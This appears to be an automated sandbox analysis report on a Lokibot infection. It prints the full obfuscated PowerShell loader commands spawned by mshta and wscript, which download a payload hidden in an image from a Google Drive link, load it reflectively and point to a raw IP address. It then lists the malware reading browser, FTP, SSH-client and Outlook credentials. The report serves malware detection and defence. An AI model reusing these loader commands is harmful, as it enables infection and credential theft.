[d'+'nlib'+'.io.home].getmethod(5l7vai5l7);swrvaimethod.invoke(swrnull, @(5l7txt.ttrlpms/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -replace'5l7',[char]39 -replace 'swr',[char]36 -creplace 'fw1',[char]124) )"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjhbtag9tzvsymv0rjfbzae9tzvszmf0rj3gnksaoicgoj3n3umltywdlvxjsid0gnww3jysnahr0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxignww3o3n3undlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c3dsaw1hz2vcexrlcya9ihn3undlyknsawvudc5eb3dubg9hzerhdgeoc3dsaw1hz2vvcmwpo3n3jysnumltywdlvgv4dca9ifttexn0zw0nkycuvgv4dc5fbmnvzgluz10nkyc6olvurjgur2v0u3ryaw5nkhn3umltywdlqnl0zxmpo3n3unn0yxj0rmxhzya9idvsnzw8qkenkydtrty0x1nuqvjupicrjz41bdc7c3dszw5krmxhzya9idvsnzw8qkftrty0x0vord4+nww3o3n3unmnkyd0yxj0sw5kzxggpsbzd1jpbwfnzvrlehqusw5kzxhpzicrjyhzd1jzdgfydezsywcpo3n3umvuzeluzgv4id0gc3dsaw1hz2vujysnzxh0lkluzgv4t2yoc3dszw5krmxhzyk7c3dsc3rhcnrjjysnbmrlecatz2ugmcatyw5kihmnkyd3umvuzeluzgv4ic1ndcbzd1jzdgenkydydeluzgv4o3n3unn0yxj0sw5kzxggkz0gc3dsc3rhcnrgbgfnlkxlbmd0adtzd1jiyxnlnjrmzw5ndgggpsbzd1jlbmrjbmrlecatihn3unn0yxj0sw5kzxg7c3dsymfzzty0q29tbwfuzca9ihn3umltywdlvgv4dc5tdwjzjysndhjpbmcoc3dsc3rhcnrjbmrlecwgc3dsymfzzty0tgvuz3rokttzd1jiyxnlnjrszxzlcnnlzca9ic1qbycrj2luichzd1jiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgrncxjysniccrj0zvckvhy2gtt2jqzwn0ihsgc3dsxyb9kvstms4ulshzd1jiyxnlnjrdb21tyw5klkxlbmd0acldo3n3umnvbw1hbmrcexrlcya9jysnifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoc3dsymfzzty0umv2zxjzzwqpo3n3umxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchzd1jjb21tyw5kqnl0zxmpo3n3unzhau1ldghvzca9iftkjysnbmxpyicrjy5jty5ib21lxs5hzxrnzxrob2qonww3vkfjnww3kttzd1j2ywlnzxrob2qusw52b2tlkhn3um51bgwsieaonww3dhh0llruukxqtvmvmtqvmtqxljy3ms4zlji5ms8vonb0dgg1bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg8nkyc1bdcsiccrjzvsn2fzcg5ldf9yzwdicm93c2vyczvsnywgnww3zccrj2vzyxrpdmfkbzvsnywgnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3mtvsnyw1bddkzxnhdgl2ywrvnww3ksk7jykglxjluexhy0unnww3jyxby0hhcl0zosatcmvqtgfjrsanc3dsjyxby0hhcl0zniaglunszxbmqwnlicanrncxjyxby0hhcl0xmjqpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[21]+$pshome[30]+'x') ( (('swrimageurl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 5l7;swrwebclient = new-object system.net.w'+'ebclient;swrimagebytes = swrwebclient.downloaddata(swrimageurl);sw'+'rimagetext = [system'+'.text.encoding]'+'::utf8.getstring(swrimagebytes);swrstartflag = 5l7<<ba'+'se64_start>'+'>5l7;swrendflag = 5l7<<base64_end>>5l7;swrs'+'tartindex = swrimagetext.indexof'+'(swrstartflag);swrendindex = swrimaget'+'ext.indexof(swrendflag);swrstarti'+'ndex -ge 0 -and s'+'wrendindex -gt swrsta'+'rtindex;swrstartindex += swrstartflag.length;swrbase64length = swrendindex - swrstartindex;swrbase64command = swrimagetext.subs'+'tring(swrstartindex, swrbase64length);swrbase64reversed = -jo'+'in (swrbase64command.tochararray('+') fw1'+' '+'foreach-object { swr_ })[-1..-(swrbase64command.length)];swrcommandbytes ='+' [system.convert]::frombase64string(swrbase64reversed);swrloadedassembly = [system.reflection.assembly]::load(swrcommandbytes);swrvaimethod = [d'+'nlib'+'.io.home].getmethod(5l7vai5l7);swrvaimethod.invoke(swrnull, @(5l7txt.ttrlpms/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -replace'5l7',[char]39 -replace 'swr',[char]36 -creplace 'fw1',[char]124) )"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_00406069 GetUserNameW,

26_2_00406069

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
